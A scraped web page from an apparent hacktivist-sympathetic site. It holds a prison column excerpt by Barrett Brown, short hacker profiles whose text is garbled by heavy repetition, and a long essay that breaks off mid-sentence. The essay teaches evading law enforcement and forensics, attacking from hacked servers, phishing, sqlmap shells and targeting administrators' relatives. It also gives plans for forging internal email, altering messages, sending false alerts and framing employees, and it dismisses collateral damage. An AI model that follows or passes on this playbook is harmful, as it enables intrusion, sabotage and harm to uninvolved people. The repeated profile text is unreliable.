I wasn’t taken straight to Fort Worth from Kaufman County, as that would be too quick and easy and cost effective, the prison being less than a half-hour’s drive away; rather, I was taken to the federal courthouse in downtown Dallas to wait for another ride to the Mansfield jail, where I’d already spent much of 2013, and from which I’d eventually be taken to Fort Worth next time a U.S. Marshal happened to be going in that general direction. At the end of the day’s no doubt majestic federal court proceedings, I was placed back in the chew-your-arm-off-and-only-then-shall-I-give-you-the-key van for the ride over to Mansfield. In the rusty cage next to mine were two girls, shackled like I was, who had been to court that afternoon. One had been crying; she’d just been sentenced to eight years for conspiracy to distribute marijuana despite having originally been given reason to expect considerably less time, as she’d cooperated with the FBI. The agents had clearly found her testimony helpful, as they’d met with her a second time, but nonetheless they’d neglected to ask the judge for the sentence reduction they’d promised her in exchange. Like most drug dealers, this girl was in the habit of making and keeping bargains on the strength of her word and expected others to do likewise, but then she’d never dealt with the FBI before.

Just as she finished sobbing out her story, something rather incredible happened: the U.S. Marshal who was driving us back to the jail, having been listening to this account, apparently decided that he was sick of serving as another cog in a fascist system that literally places females in chains and ruins their lives over consensual non-crimes like selling marijuana, because he pulled over, stepped out of the van, came around the back, unlocked the girl’s cage, removed her chains and leg irons and handcuffs, gave her all the cash he had on him, kissed her on the forehead, and advised her to hitchhike to Mexico and then catch a flight to Europe, where she’d have another chance at life, far away from the all-seeing state that had sought to deprive her of her youth and freedom.

Just kidding. Actually he drove us to the jail while the girl cried in her cage.

***

Quote of the Day:

“Truth does not often escape from palaces.” —William Durant

***

Editor’s note: Barrett Brown has been incarcerated since September 2012. Go here to read earlier installments of “The Barrett Brown Review of Arts and Letters and Jail.” If you’d like to send him a book, here’s his Amazon wish list.

Barrett Brown #45047-177
FCI Fort Worth
P.O. Box 15330
Fort Worth, TX 76119

YTCracker – Hacker, Rapper, Activist

Dec 9, 2014 | Activism

Bryce Case, Jr., otherwise known as YTCracker, is a “former” cracker most known for defacing the webpages of several federal and municipal government websites in the United States, as well as several in private industry at the age of 17. Bryce Case, Jr., otherwise known as YTCracker, is a “former” cracker most known for defacing the webpages of several federal and municipal government websites in the United States, as well as several in private industry at the age of 17.Bryce Case, Jr., otherwise known as YTCracker, is a “former” cracker most known for defacing the webpages of several federal and municipal government websites in the United States, as well as several in private industry at the age of 17.Bryce Case, Jr., otherwise known as YTCracker, is a “former” cracker most known for defacing the webpages of several federal and municipal government websites in the United States, as well as several in private industry at the age of 17.

Christopher Doyon – Hacker

Dec 9, 2014 | Anonymous, Whistleblowers & Dissidents

Christopher Doyon Chris Doyon (alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.Chris Doyon (alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.(alias “Commander X”), a self-described leader ‘within’ Anonymous, was arrested in September 2011 for a cyberattack on the website of Santa Cruz County, California. He jumped bail in February 2012 and fled across the border into Canada.

Gary McKinnon – Hacker

Dec 9, 2014 | Extra-Dimensional, Whistleblowers & Dissidents

Gary McKinnon (born 10 February 1966) is a Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the publi Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the publi Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the public.Gary McKinnon (born 10 February 1966) is a Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the publi Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the publi Scottish systems administrator and hacker who was accused in 2002 of perpetrating the “biggest military computer hack of all time,”^[2] although McKinnon himself – who has a diagnosis of Asperger’s Syndrome – states that he was merely looking for evidence of free energy suppression and a cover-up of UFO activity and other technologies potentially useful to the public.

Recommendations for the Hacktivist Community

Nov 13, 2014 | 2020 Relevant, Anonymous, News

Statement of Purpose

I have been observing the hacker and hacktivist communities, at times very
closely, for many years. The exact definition of “hacker” and “hacktivist”
varies from author to author, so I shall make my interpretation of these words
very clear. Let us define a “hacker” as someone who utilizes their knowledge of
computers and of computer networks to make money via illegitimate means. Let us
define a “hacktivist” as someone who utilizes their knowledge of computers and
of computer networks to do justice when justice is not done by the state. I
have found that these two communities are inextricably linked, yet remain
completely separate entities. Many hackers double as hacktivists in their spare
time, although most hacktivists do not fancy themselves hackers.

Although hackers turned hacktivists have the very best of intentions, and their
input and expertise is of great value to the hacktivist community, they have
inadvertently suppressed the potential of the very community they are trying to
aid. The get-in-get-the-goods-get-out methodology of the stolen credit card
driven hacker community that has been transfered to the hacktivist community
via ideological osmosis has tragically affixed blinders to it. It has caused
the hacktivist community to think linearly and strive to do nothing more than
to blindly infiltrate target organizations and immediately leak whatever data
they happen to stumble across. This must change. Stealing and leaking data
makes a point, but it is sometimes necessary to do more than just make a point,
to inflict real, measurable damage. In certain, extreme cases an organization’s
disregard for human rights warrants its immediate and complete obliteration.

In this essay, I will discuss a multitude of ideological, operational, and
technical changes that ought to be made to the hacktivist community. These
proposed changes have been derived from my personal observations. Some will
find the ideas contained within this document to be the product of common
sense. I have found these people to be few in number. If the community accepts
my suggestions it will not only become more effective, but the risks associated
with participating in it will be drastically lowered. My intent in writing this
is not to aid criminals, but rather to aid people who wish to do battle with
governments and corporations that have become criminals. If freedom is to
remain on this earth, its people must be willing and able to take arms to
defend it, both physical and digital.

Personal Security

Sound operational security is the foundation from which all effective
cyber-offensives are launched. You should, at all times, put your own, personal
security above the success of your operations and interests. The security
precautions taken by most hacktivists I have met are mediocre at best, and
needlessly so. Maintaining sound personal security is by no means difficult. It
requires much caution but very little skill. I have devised a series of
security precautions that hactivists should take and divided them up into six
main categories: environmental, hardware, software, mental, pattern related,
and archaeological. We shall examine each individually.

(1) Environmental:

There are but two places you can work: at home or in public. Some people insist
that working at home is best and others insist that working in public is best.
The proper working environment debate has been raging on in the hacker
community for quite some time now, and has great relevance to the hacktivist
community, as most governments view hackers and hacktivists as one in the same.
Proponents of the “work in public” argument claim that by always working at a
different public location, you significantly lower your chances of being
apprehended. They argue that even if the authorities are able to trace many of
the cyber-attacks you took part in back to the public places where you took
part in them from, that does not bring them any closer to finding you. Most
retail stores and coffee shops do not keep surveillance footage for more than a
year at the most, and even if the authorities are able to get a photo of you
from some security camera, that does not necessarily lead them directly to your
front door, especially if you wore a hoody the entire time you where working
and the camera never got a clear shot of your face. On the other hand,
proponents of the “work at home” argument argue that the risk of being seen and
reported, or merely recorded while working in a public place far outweighs the
benefits of the significantly large increase in anonymity that working in
public provides. Both sides have legitimate points, and I urge you to consider
both of them.

If you decide to work in public, the number one threat you face is other
people. Numerous large criminal investigations have been solved using the
observations of average everyday citizens who just happened to remember seeing
something suspicious. If people sense that you are trying to hide something,
they will watch you more closely than they would otherwise. It is important to
always “keep your cool” as the old saying goes. Always try to sit in such a way
that your screen is facing away from the majority of the people in the room you
are sitting in. Corners are your friend. Try to blend in with the crowd. Dress
in plain cloths. Draw no attention. If you are in a coffee shop, sip some
coffee while you work. If you are in a burger joint, buy a burger. If you are
in a library or book store, set a few books beside your laptop. Also, be very
aware of security cameras, both inside the establishment you are working in as
well as on the street near it. Being captured on film is alright as long as the
camera can not see what is on your screen. Some store cameras are watched by
actual people who will undoubtedly report you if they find out what you are
doing. More and more governments are starting to place very high quality CCTV
cameras on their streets to monitor their citizens, and these devices can be a
problem if they are peering over your shoulder through a window you are sitting
beside. When working in public, it is possible that you may have to confront a
law enforcement officer face to face. Law enforcement officers can smell
uneasiness from a mile away, and if you look like you are up to no good it is
possible that a cop will come and talk to you. Always have some sort of cover
story made up before you leave home to explain why you are where you are. If
you are forced to confront a law enforcement officer you should be able to talk
your way out of the situation.

If you decide to work at home, the number one threat you face is your own ego.
Just because you are at home does not mean that your working environment is
secure. Be aware of windows in close proximity to your computer as well as your
security-illiterate or gossipy family members. Security issues in relation to
network configuration begin to come into play when you work at home. If your
computer were to somehow get compromised while you are working at home,
perhaps by your government, it would be nearly impossible for the person or
group of people rummaging around inside of your system to get your actual IP
address (provided that you adhere to the software security guidelines that we
will discuss later). However, if your wi-fi password (or the name of your
printer, or the name of another computer on the network) contains your actual
last name and part of your address, tracking you down becomes very easy. A lot
of people name their network devices and structure their network passwords in
this way.

It is also possible that if an attacker that has infiltrated your computer
notices other machines on your network they can pivot to them (infect them with
malware using your computer as a spring board of sorts) and use them to get
your IP address. A lot of Internet enabled household devices have cameras on
them (your smart TV, your Xbox, and your high tech baby monitor to name a few)
and said cameras can potentially be leveraged against you. It is in your best
interest to not have any other machines running on your home network while you
are working. Also, change your wi-fi password every once in awhile and make
sure that the password on the administrative interface of your router is
something other than the out-of-the-box default. If your computer gets
compromised, logging into your router using username “admin” and password
“admin” is elementary for a moderately skilled attacker. Most modern routers
list their WAN IP address on their control panels.

Regardless of where you decide to work, be aware of mirrors and glass picture
frames near your workplace. In the right light, both of these items have the
potential to reflect crystal clear images of your screen to onlookers across
the room. In addition to this, understand that modern cell phones are your
worst enemy. Not only are they always going to be the weakest link in your
security setup, but if they are somehow compromised they are equipped with a
camera and microphone. Recent studies suggest that it is possible for smart
phones to listen to the high pitched noise your CPU makes and deduce your PGP
private key. Furthermore, the metadata collected by your phone coupled with
pattern analysis techniques could potentially allow your government to link
your real life and online personas together after some time. We will discuss
this in depth later. Leave your phones at home and if possible keep all phones,
yours or otherwise, far away from your computer. Other portable devices such as
iPods and tablets potentially pose the same risk that phones do and should be
treated the same.

(2) Hardware:

Modern computers come equipped with microphones, speakers (which can be used as
microphones under the right circumstances), and cameras. All of these features
can potentially be leveraged to identify you if your computer is compromised.
To mitigate these risks, these features should be physically removed. Your
computer’s microphone and speakers should be ripped out of it, but you should
not rip out your web cam, as it will alter the outward appearance of your
computer and potentially draw attention to you. Instead, open your computer’s
screen and snip the wires that connect to your web cam. Wrap the ends of the
wires in electrical tape so sparks do not jump in between them. If you must
listen to an audio file while working, use headphones. Only keep your
headphones plugged into your computer when you are using them. The computer you
use for your hacktivist activities also should not contain a hard drive, as
they are unnecessary for our purposes.

(3) Software:

Always use a TOR enabled Linux live system when working. At the present moment,
Tails (The Amnesiac Incognito Live System) is by far the best live distribution
for your purposes. You can read more about TOR at www.torproject.org and you
can read more about acquiring, setting up, and using Tails at tails.boum.org.
The Tails operating system lives on a USB flash drive. Every time you start up
your computer, you must first insert your Tails flash drive into it. The Tails
website will guide you through making said flash drive. Tails will
automatically direct all of your outgoing traffic into the TOR network in an
effort to hide your IP address. If you use Tails you will be completely
anonymous and be able to work with impunity provided that:

* You keep your Tails USB up to date. New versions of the Tails
operating system are released every few months.

* You do not login into your “real world” accounts while using Tails.
Do not check your Twitter feed while you are working.

* You do not use Tails to create an account with an alias that you have
used before. If you have been “0pwn” for the past seven years, now
is a good time to stop being 0pwn.

* You do not alter Tails’ default security settings. They are the way
they are for a reason.

* You do not use Tails to create an online account with a password that
you have used before. Doing this only makes deanonymizing you easier.

* You do not install and use random packages that “look cool”; they
could be miscellaneous. Only use packages and scripts that you trust.
Tails is not bullet proof.

* If you decide to set a sudo password when starting up Tails, make
sure that it is very strong.

* You stay conscious of metadata analysis techniques. We will discuss
these later.

* You switch exit nodes every ten to fifteen minutes. This can be done
by double clicking the little green onion in the upper right hand
corner of your Tails desktop and hitting the “Use a New Identity”
button.

* You follow the communication guidelines laid out later in this
document.

More information can be found on the Tails warning page: https://tails.boum.org/
doc/about/warning/index.en.html. Be aware that it is very easy for your ISP
(which is probably working closely with your government) to tell that you are
using both TOR and Tails. It is probably in your best interest to use something
called “TOR bridge mode”. You can read more about how to configure Tails to
use TOR bridges here: https://tails.boum.org/doc/first_steps/startup_options/
bridge_mode/index.en.html.

Tails is unique in that it has a special feature that wipes your computer’s
memory before it shuts down. This is done in order to mitigate risks associated
with the dreaded “cold boot attack” (a forensics method in which a suspects RAM
is ripped out of his or her computer and then thrown into a vat of liquid
nitrogen to preserve its contents for later analysis). This feature is also
triggered if you pull your Tails flash drive out of your computer while you are
working. If while you are working you ever feel that the authorities are about
to move in on you, even if you have a seemingly irrational gut feeling, yank
your Tails flash drive out of your computer. Tails also has a feature that
allows it to disguises itself as a Windows desktop. Using this feature in
public will reduce your risk of capture significantly.

(4) Mental:

A skilled attacker is well disciplined and knows that he must keep his actions
and skills a secret in order to remain safe from harm. Do not flaunt the fact
that you are dissatisfied with your government, a foreign government, or a
particular corporation. Do not attend protests. Do not publicly advertise the
fact that you have an above average aptitude for computer security offensive or
otherwise. And whatever you do, do not tell anyone, even someone you think you
can trust, that you are planning to launch an organized cyber-attack on any
organization, big or small. If you draw attention to yourself no amount of
security precautions will keep you safe. Keep your “real” life mentally
isolated from your “hacktivist” life. One lapse in operational security could
end you.

Be alert and focused. Remain mentally strong. Come to terms with the illegality
of your actions and what will happen to you if you are apprehended. As a wise
man once said, “A warrior considers himself already dead, so there is nothing
to lose. The worst has already happened to him, therefore he’s clear and calm;
judging him by his acts or by his words, one would never suspect that he has
witnessed everything.” It is perfectly acceptable to be paranoid, but do not
let that paranoia consume you and slow your work. Even if you are extremely
cautious and follow this document’s advice to the letter, you still may be
hunted down and incarcerated, tortured, or killed. Some countries do not take
kindly to hacktivists. It is best that you be honest with yourself from the
beginning. In order to operate effectively you must be able to think clearly
and see the world as it actually is.

(5) Pattern Related:

When your online persona is active your real life persona ceases to exist, and
an observant adversary can use this to their advantage. If your ISP, bank, and
mobile phone provider are “cooperating” with your government and allowing them
to browse through all of their records (a fair assumption in this day and age)
then, eventually, they will be able to deduce your real identity by comparing
everyone’s data to information about your online persona. If the government
looks backs on all of the records they have collected in the past year and
notice that you never make a credit card purchase, watch Netflix, go on your
Facebook, Google, or Twitter account, or change your physical location while
1337Hax0r64 is online on some anti-government forum on the deep web, they will
assume that you are 1337Hax0r64. Even information about your home network’s
bandwidth usage can give away your real identity.

Luckily, performing the type of metadata analysis attack described above takes
time, usually many months. It is very important that you change aliases often,
preferably every three or four months. Shed your old names like a snake sheds
its skin. When you do change your online name, make sure your new identity
can not be tied back to your old one.

DO NOT not launch cyber-attacks from your own computer. Launch attacks only
from hacked servers, servers purchased with washed bitcoins, or free shell
accounts. Certain types of cyber-attacks produce a large amount of traffic over
a short amount of time. If the bandwidth usage of your home network spikes at
the same instant that a government or corporate server is attacked, the time it
takes to deanonymize you is reduced significantly. This is especially true if
you launch multiple attacks on multiple occasions. Launching attacks in this
way can be mentally exhausting. Configuring a new attack server with your tool
set every time your old attack server is banned (an inevitable occurrence) can
be a tedious task indeed. I personally recommend creating a bash script to
automatically install your favorite tools to make this transition process
easier. Most hackers and offensive security professionals use under thirty
non-standard tools to do their job, so configuring a new server with everything
you need should not take very long if you know what you are doing. Consider
equipping your server with TOR and a VNC server (for tools that require GUIs
such as most popular intercepting proxies) as well.

(6) Archaeological:

You must insure that there is no forensics evidence of your actions, digital or
otherwise. If the government breaks into your house and rummages through your
things, they should find nothing interesting. Make sure that you never make any
physical notes pertaining to your hacktivist activities. Never keep any
computer files pertaining to your hacktivist activities in your home. Keep all
of your compromising files, notes, scripts, and unusual attack tools (the ones
that can not be installed with apt-get or the like), and stolen information in
the cloud. It is recommended that you keep all of your files backed up on
multiple free cloud storage providers so that in the event that one of the
providers bans your account you still have all of your data. Do not name your
cloud accounts in such a way that they can be connected back to your online
persona. Never, under any circumstances, mention the names or locations of your
cloud accounts to the people you work with. Always hit the “Use New Identity”
button on your TOR control panel after accessing your cloud storage solutions.
Every time you shed your old alias, shed your old cloud accounts.

Security of Communications

The majority of hacktivists I have met communicate via public IRC. Using IRC is
fine for meeting other hacktivists, but as soon as you muster a team of other
hacktivists who wish to attack the same target as you, move to another more
secure form of communication. Some means of communication are more secure than
others, but completely secure communication does not exist. The following
guidelines are meant to work in conjunction with the personal security
guidelines that where discussed in the previous section. If proper personal
security measures are implemented effectively, compromised communication will
result in operational failure at worst and not complete deanonymization. Since
operational failure may very well set you and your cause back several months,
it is in your best interest to attempt to communicate securely:

* Remember that any of the people you meet on the clearnet, deep web,
or public IRC channels who claim to be on your side could actually
be government agents trying to sabotage your operations.

* If possible, communicate mainly via privacy friendly email accounts
(not Gmail, Yahoo, AT&T, etc.) and encrypt all of your messages with
PGP. When a cyber-attack is being carried out it is often necessary
to be able to communicate with your accomplices instantaneously.
Since encrypting, sending, receiving, and decrypting messages by hand
takes time, using PGP in time sensitive situations like this is not
feasible. If you have to confer in an IM environment, use a program
like TorChat that uses its own form of asymmetric encryption to send
and receive messages instantly.

* Use strong passwords for all of your online accounts. The best way to
make a strong password is to pick eight or nine random words and
string them together. Passwords like this are easy to remember but
hard to guess.

* Never give away any personal information (such as country, interests,
hobbies, health, etc.) or give insight into your feelings or
emotions. Your fellow hacktivists are not your friends and should
never be talked to as such. Giving away this sort of information will
make tracking you easier.

* When you receive messages, do not retain them, even if they are
encrypted. Read them, make note of any hard to remember details
(like long server passwords for example), and then delete them.
Having a mile long digital paper trail can not lead to anything good.
In some cases deleted messages on email serves can be recovered via
computer forensics, but deleting messages quickly may reduce the odds
that they can be.

* When typing messages, do so in a word processor on your computer.
Never write your message inside of a communication program (such as
an online email client, forum PM box, etc.). People have been known
to accidentally send unencrypted messages before. The effects of such
an error can be devastating.

* If you find yourself writing large swaths of text intended for public
release (like essays or manifestos) use a tool like Anonymouth to
obscure your writing style. Your writing style is as unique as a
finger print and can be used to identify you.

* Never, under any circumstances, execute a file on your computer or on
your server that has been given to you by a fellow hacktivist. You
should never run into a situation where doing this is necessary.

* Do not disclose information about your involvement in previous
hacktivist operations to people who where not also part of the same
operation.

* If one of the people that you are working with gets captured, assume
that the people who have captured them know everything that they do.

Philosophy of Attacking

The hacktivist community, like every community, has its own unique set of
philosophical musings, taboos, and dogmas. While I do not advocate the severe
alteration of the principles and philosophies on which the community was built,
I do wish to point out a number of flaws in certain aspects of their
composition. These flaws serve only to hold back the community and should be
openly discussed.

(1) When hacktivists target an organization, their goal is more often than not
to force said organization to stop functioning permanently, or at least for the
longest time possible, in an effort to stall unjust actions from being carried
out or to seek retribution for unjust actions done in the past. Leaking
databases, DoXing influential individuals, defacing websites, and launching
massive DDoS campaigns, four of the modern hacktivist community’s favorite
activities, accomplish this goal – to an extent. Infiltrating a target
organization and sowing discord within its ranks is magnitudes more effective
than leaking credit card numbers or putting a CEO’s social security number on
Pastebin, yet it is rarely, if ever, considered to be a viable course of
action. Subtly and silently fostering suspicion and distrust inside of your
target will have a longer lasting impact than simply pointing out that its
security policy has some weak points.

(2) Hacktivists crave publicity, yet they are the most effective when they
operate undetected. Stay hidden. Although it may seem tempting at times, do not
destroy large amounts of information on your target’s computers or servers.
Doing so will announce your arrival inside of your target’s network rather
loudly. Flashy, public displays of power have no place in the hacktivist
community. Just because you are hiding behind TOR does not mean that you should
not make an effort to cover your tracks. Conceal your attack not to mask your
identity, but to convince your target that no attack was carried out in the
first place.

(3) Once your hacktivist collective has decided to attack an organization,
strike fast and strike hard. Overwhelm your target. A well disciplined and well
organized team of attackers can penetrate most networks within a few hours.
Far too often I have seen hacktivist collectives declare all out war on someone
and then attack them slowly and gain entry into their network days, sometimes
even weeks later. By attacking slowly, you give your target time to react and
strengthen their defenses. Detecting an attack from a large hacktivist
collective is a trivial task, but as history has shown detecting the presence
of one inside of a network, especially a large network, can be tricky.

(4) Cyber-attacks seldom go as planned. If you are attempting to do anything
that involves the coordination of more than two people, keep this in mind. It
is not uncommon for tools to stop working in the middle of an attack. It is not
uncommon for reverse shells to die unexpectedly. It is not uncommon for
seemingly simple actions to take hours to perform. You must be ready to think
on your feet and quickly adjust your attack plan to accommodate the ever
changing conditions within the network you are attacking. Predefined
contingency plans are mostly useless.

(5) Remember that no system is impenetrable. On more than one occasion I have
seen hacktivists give up on trying to infiltrate a target network because their
Nessus scan did not yield any useful results. As a hacktivist, you are not
bound by the typical constraints of a pentester. If you can not successfully
attack a website, try attacking its hosting provider. Try attacking the
administrator’s email account. Try going after random social accounts belonging
to the administrator’s family. Try planting iframes in websites you suspect the
administrator frequents in an effort to infect him. If you cause extensive
collateral damage, who cares? It is not your problem. Sometimes the ends
justify the means. Be creative.

(6) Many hacktivists possess unrealistic, self-constructed mental images of the
ideal cyber-attack. In the majority of these movie-induced delusions, the ideal
attack utilizes numerous 0days, an arsenal of home made tools, and highly
advanced, unimaginably complex network intrusion techniques. In reality, this
type of thinking is incredibly dangerous and causes some hacktivists to attempt
to perform convoluted, elaborate attacks to gain the respect of their peers.
When breaking into highly secured networks, such attacks only draw unnecessary
attention. The best attacks are the ones that work. They are usually simple and
take little time to execute. Using sqlmap to spawn a shell on your target’s
server by exploiting a flaw in their website’s search feature is a viable if
not ideal attack. It allows you to access the inside of your target’s network.
Exploiting a vulnerable FTP daemon on one of your target’s servers using public
exploit code is a viable if not ideal attack. It allows you to access the
inside of your target’s network. Using Metasploit in conjunction with a fresh
Gmail account to launch a phishing campaign against your target’s employees is
a viable if not ideal attack. It allows you to access the inside of your
target’s network. The media hates it when hacktivists use open source software
to do their work. Whenever a hacker or hacktivist is arrested for doing
something that involved using “someone else’s” tools, they are publicly
shammed. “Anyone could have done that” they say. “He’s just an unskilled script
kiddie” they say. Claiming that someone is less of a hacker solely because they
partially depend on someone else’s code borders on absurd. It amounts to
claiming that Picasso is a bad artist because he did not carve his own brushes,
synthesize his own paints, and weave his own canvas. Do not shy away from using
open source tools and publicly available information to accomplish your goals.
Hacking is an art, and nmap is your brush.

Organization and Formation

Most of the hacker and hacktivist groups I have observed are unorganized and
undisciplined. They claim to perform actions as a collective, yet when it comes
time to actually launch an attack they attempt to infiltrate their targets as
individuals, each member launching attacks of their own without making the
faintest attempt to coordinate their actions with others. Here I shall describe
a schema that could be easily adopted by any hacktivist collective to allow it
to facilitate highly coordinated attacks involving large numbers of attackers
with great ease. It will be presented as a series of steps.

Step One: Organize yourselves into multiple small groups. These groups shall be
referred to as strike teams. The ideal strike team is composed of three parts
attack specialists, two parts social engineering specialists. Attack
specialists should at least be able to identify and competently exploit
potential vulnerabilities in websites and be able to exploit vulnerable or
misconfigured services. Social engineering specialists should have at least
some real world experience before participating in a strike team. Attack
specialists should only concern themselves with launching attacks and social
engineering specialists should only concern themselves with social engineering.
Well-defined roles are the key to a strike team’s success. This configuration
will often create an abundance of social engineering specialists, and that is
perfectly acceptable. Having the capability to immediately launch multiple well
planned social engineering campaigns is crucial. The size of a strike team
will be determined by the skill of its members. Highly skilled individuals
should work in very small strike teams (five member teams are acceptable)
whereas unskilled individuals should work in larger strike teams (up to a few
dozen). The organization of strike teams should be coordinated as a collective.
No one person should be given the authority to sort people themselves. Strike
teams should function as “sub collectives” and be autonomous. Hacktivist
collectives are composed of people around the world, most of whom can not be
online all the time. This means that all strike teams should set themselves up
knowing that their members will pop on and offline and that it is possible new
members will have to be annexed at a later time.

Step Two: Within each strike team, agree upon a stratagem; a broad, realistic,
nonspecific plan of action that aims to accomplishes one, very specific goal.
Strike teams should only execute one stratagem at a time. Multiple strike teams
within the same hacktivist collective can execute different stratagems at the
same time in an effort to accomplish some sort of final goal (perhaps to
destabilize an organization or to acquire trade secrets). The next section of
this essay is devoted solely to exploring the concept of stratagems and how to
best form and use them. Strike teams should be allowed to do what they want,
but their initial stratagem should be approved by the collective so that no two
strike teams attempt to do the same thing at the same time.

Step Three: As a strike team, map your target’s attack surface. If multiple
strike teams are all attacking the same network, they should share information
very closely in this step. It is very possible that multiple strike teams
working together to accomplish the same goal could actually be attacking
different networks, in which case mapping should be done within individual
strike teams. Each member of a given strike team should attempt to map the
target network themselves, and then members should compare information. It is
very unlikely that anything will be overlooked by every single member of the
team.

Step Four: Divide your target network up into manageable chunks and assign
certain individuals within your team to each one of those chunks. Efficient
devision of labor is key to launching speedy attacks. Here is an example
involving a network composed of four servers (two SQL servers, a DNS server,
and a web server hosting a feature rich corporate site) and a strike team
composed of six attack specialists and four social engineering specialists:

* Have one attack specialist attack the SQL and DNS servers.

* Have one attack specialist attack the website’s multistage user
registration mechanism and login mechanism.

* Have one attack specialist attack the contact and session management
mechanism.

* Have one attack specialist attack any forms not assigned to other
attack specialists as well as any other potentially exploitable
scripts, pages, or mechanisms.

* Have one attack specialist and two social engineering specialists
attempt to launch some sort of phishing champaign against the
company’s employees.

* Have one attack specialist and two social engineering specialists
attempt to convince the company’s hosting provider that they are the
rightful owners of the company’s four servers and have been locked
out of their email account.

Step Five: Drill yourselves. This step is optional but highly recommended.
Procure a server with a large amount of RAM and multiple processors. Have one
member of your strike team set up a virtual network on it that, to the best of
your knowledge, mimics the network you are planning to attack. This one team
member should not participate in the drills themselves, and they should not
give other team members details pertaining to the virtual network. If you are
planning on attacking a large cooperation, set up the virtual network like a
large cooperate network with a labyrinth of firewalls, routers, switches, and
domain controllers. If you are planning on attacking a small cooperation or
home business, set up your network accordingly. You should never have to
visualize more than 12 workstations, even if your team is doing a complex
pivoting exercise. As a group, attempt to break into your virtual network and
execute your stratagem. The virtual network should be deliberately
misconfigured so that there is a way for your team to infiltrate it and
accomplish their simulated goal, but the misconfigurations should be extremely
subtle. The team should have to work very hard to find them. Run multiple
drills. After each drill, the misconfigurations in the network, and potentially
the layout of the network itself, should be altered to force your team to
attack it in a different way or to exercise a different skill. The purpose of
these drills are two fold. Firstly, they allow your team members to get
accustomed to working together. Secondly, they will prepare your team for the
day when they actually go up against your real target network.

Step Six: Execute your stratagem on your target network. Your strike team
should attack methodically and silently. Every member should know what they
need to do and how they need to do it. No mistakes should be made. Every tool
you use should be well honed and function flawlessly. Not a second should be
wasted. Use time to your advantage. Your target organization will be the most
unprepared for an attack in the middle of the night when all of its IT staff
are at home sound asleep. If your stratagem calls for being embedded in your
target network for a long period of time, tread very lightly once you
infiltrate it.

Interlocking Stratagems in Theory

In this section I will give multiple examples of stratagems that an actual
strike team could make use of. You should combine multiple stratagems to
accomplish your ultimate goal. Individual stratagems are like pieces of a
jigsaw puzzle, and are intended to be pieced together. A strike team should
execute multiple stratagems in succession, possibly in cooperation with other
strike teams in an effort to accomplish a common goal. This section is not
intended to be a play book. I encourage you to build off of my stratagems or,
better yet, devise your own. Some stratagems are:

(1) Collect information on individuals within the target organization. Mount a
phishing campaign against the organization and gain access to as many
workstations as possible. Once you have breached its network, do not pivot.
Attempt to locate any useful information on the workstations you have
compromised, and then remain in the network for as long as possible doing
nothing more than idly gathering intelligence.

(2) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Then, send a number of blatantly false
messages to one or more members of the organization using the credentials of
another member of the organization. Multiple false messages should be sent over
some period of time. When members of the organization begin to receive false
messages from their colleagues, distrust will begin to take root.

(3) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Then, devise some way to intercept and
inspect or modify messages in transit within the target organization
(essentially, perform a man in the middle attack). Every once in awhile, alter
a message in a subtle but disruptive way. Perhaps change a date or a time so
certain individuals do not arrive at their meetings on time or do not arrive at
all. Once you have reason to believe that your modifications have taken their
toll (i.e. the person you targeted missed their meeting), undo the changes you
made to the message you intercepted so upon audit it appears as though the
message was never tampered with. Doing this is usually hard to detect and will
slowly cause the target organization to destabilize itself as tensions between
individuals within it begin to rise and their employees begin to question their
own sanity.

(4) Take complete or partial control over the target organization’s main means
of communication (usually email). Review a few of their messages and learn how
they are structured and formatted. Use the credentials of a high ranking
individual within the target organization to distribute a message that appears
to be from them that claims a terrible tragedy has occurred that warrants an
immediate, brash, resource intensive response from the rest of the
organization. You will most likely not be able to pull this off more than once.
This stratagem works especially well against militant groups with poorly
defined command structures but has other applications as well.

(5) Once inside of the target organization’s network, acquire a small amount of
classified data intended for the eyes of high ranking personnel only.
Strategically plant the data on the computer of one or more lower ranking
individuals. Make it look like an espionage attempt. If many key individuals
